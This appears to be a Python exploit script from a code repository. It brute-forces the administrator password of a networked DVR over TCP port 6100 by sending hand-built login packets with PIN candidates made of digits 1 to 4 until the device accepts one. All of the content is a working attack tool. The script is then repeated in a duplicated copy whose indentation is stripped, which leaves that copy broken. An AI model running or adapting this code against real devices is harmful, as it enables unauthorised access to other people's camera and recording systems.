lanrat/DVR_exploit.py

## DVR_exploit.py
#!/usr/bin/env python
import socket
import binascii
import sys
import time

def passList():
    n = 1
    li = [1]
    while (int(li[-1]) <= 44444444):
        k = str_base(int(n))
        if (k != 0):
            li.append(k)
        n = n + 1
    return li

def asctohex(string_in):
    a=""
    for x in string_in:
        a = a + ("0"+((hex(ord(x)))[2:]))[-2:]
    return(a)

def getIP():
    #Ask for IP
    while True:
        TCP_IP = input("Enter IP: ")
        try:
            socket.inet_aton(TCP_IP)
            break
        except socket.error:
            print("Error, Try Again")
    return TCP_IP

def connect(to, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((to, port))
    return s

def makePassPacket(password):
    packet = '41444d494e4953545241544f5200' #14 bytes, username: Admininstrator
    packet += '0000eb030000920303000000000058d86701' #18 bytes of something...
    packet += asctohex(password) #4 password
    packet += '00'
    size = len(packet)
    need = 128-size #64 bits in hex
    junk = '010000eb03000092030300000000003c21f6064c9c6a0700000000000000000000'#bytes of something else
    packet += junk[0:need]
    return packet

def str_base(num, base=5, numerals = '01234'):
    if base < 2 or base > len(numerals):
        raise ValueError("str_base: base must be between 2 and %i" % len(numerals))
    result = ''
    while num:
        result = numerals[num % (base)] + result
        num //= base
    if result.count('0') > 0:
        return 0
    return result

TCP_IP = getIP()
TCP_PORT = 6100

print('Generating password list..')
passwords = passList()

print('Running...')

msg1=binascii.unhexlify('01010000')
msg2=binascii.unhexlify('01010004')
msg4=binascii.unhexlify('01200040')

for password in passwords:
    s1 = connect(TCP_IP,TCP_PORT)

    #socket 1 data 1
    s1.send(msg1)
    s1.settimeout(5)
    data1 = s1.recv(4)
    data2 = s1.recv(4)
    if (binascii.b2a_hex(data1) != b'02000008'):
        sys.exit("First packet incorect")

    s2 = connect(TCP_IP,TCP_PORT)

    #socket 2 data 1
    s2.send(msg2)
    msg3=binascii.unhexlify(binascii.b2a_hex(data2)[0:8])
    s2.send(msg3)
    s2.settimeout(5)
    data3 = s2.recv(4)
    data4 = s2.recv(8)
    if (binascii.b2a_hex(data3) != b'02000004'):
        sys.exit("Second packet incorect")

    #socket 1 data 2
    passPacket = makePassPacket(str(password))
    s1.send(msg4)
    s1.send(binascii.unhexlify(passPacket))
    data5 = s1.recv(8)
    data6 = s1.recv(8)

    if (binascii.b2a_hex(data6) != b'02160000' ):
        print('Password:',password)
        sys.exit()

    time.sleep(0.1)
	#!/usr/bin/env python
	import socket
	import binascii
	import sys
	import time

	def passList():
	n = 1
	li = [1]
	while (int(li[-1]) <= 44444444):
	k = str_base(int(n))
	if (k != 0):
	li.append(k)
	n = n + 1
	return li

	def asctohex(string_in):
	a=""
	for x in string_in:
	a = a + ("0"+((hex(ord(x)))[2:]))[-2:]
	return(a)

	def getIP():
	#Ask for IP
	while True:
	TCP_IP = input("Enter IP: ")
	try:
	socket.inet_aton(TCP_IP)
	break
	except socket.error:
	print("Error, Try Again")
	return TCP_IP

	def connect(to, port):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((to, port))
	return s

	def makePassPacket(password):
	packet = '41444d494e4953545241544f5200' #14 bytes, username: Admininstrator
	packet += '0000eb030000920303000000000058d86701' #18 bytes of something...
	packet += asctohex(password) #4 password
	packet += '00'
	size = len(packet)
	need = 128-size #64 bits in hex
	junk = '010000eb03000092030300000000003c21f6064c9c6a0700000000000000000000'#bytes of something else
	packet += junk[0:need]
	return packet

	def str_base(num, base=5, numerals = '01234'):
	if base < 2 or base > len(numerals):
	raise ValueError("str_base: base must be between 2 and %i" % len(numerals))
	result = ''
	while num:
	result = numerals[num % (base)] + result
	num //= base
	if result.count('0') > 0:
	return 0
	return result

	TCP_IP = getIP()
	TCP_PORT = 6100

	print('Generating password list..')
	passwords = passList()

	print('Running...')

	msg1=binascii.unhexlify('01010000')
	msg2=binascii.unhexlify('01010004')
	msg4=binascii.unhexlify('01200040')

	for password in passwords:
	s1 = connect(TCP_IP,TCP_PORT)

	#socket 1 data 1
	s1.send(msg1)
	s1.settimeout(5)
	data1 = s1.recv(4)
	data2 = s1.recv(4)
	if (binascii.b2a_hex(data1) != b'02000008'):
	sys.exit("First packet incorect")

	s2 = connect(TCP_IP,TCP_PORT)

	#socket 2 data 1
	s2.send(msg2)
	msg3=binascii.unhexlify(binascii.b2a_hex(data2)[0:8])
	s2.send(msg3)
	s2.settimeout(5)
	data3 = s2.recv(4)
	data4 = s2.recv(8)
	if (binascii.b2a_hex(data3) != b'02000004'):
	sys.exit("Second packet incorect")

	#socket 1 data 2
	passPacket = makePassPacket(str(password))
	s1.send(msg4)
	s1.send(binascii.unhexlify(passPacket))
	data5 = s1.recv(8)
	data6 = s1.recv(8)

	if (binascii.b2a_hex(data6) != b'02160000' ):
	print('Password:',password)
	sys.exit()

	time.sleep(0.1)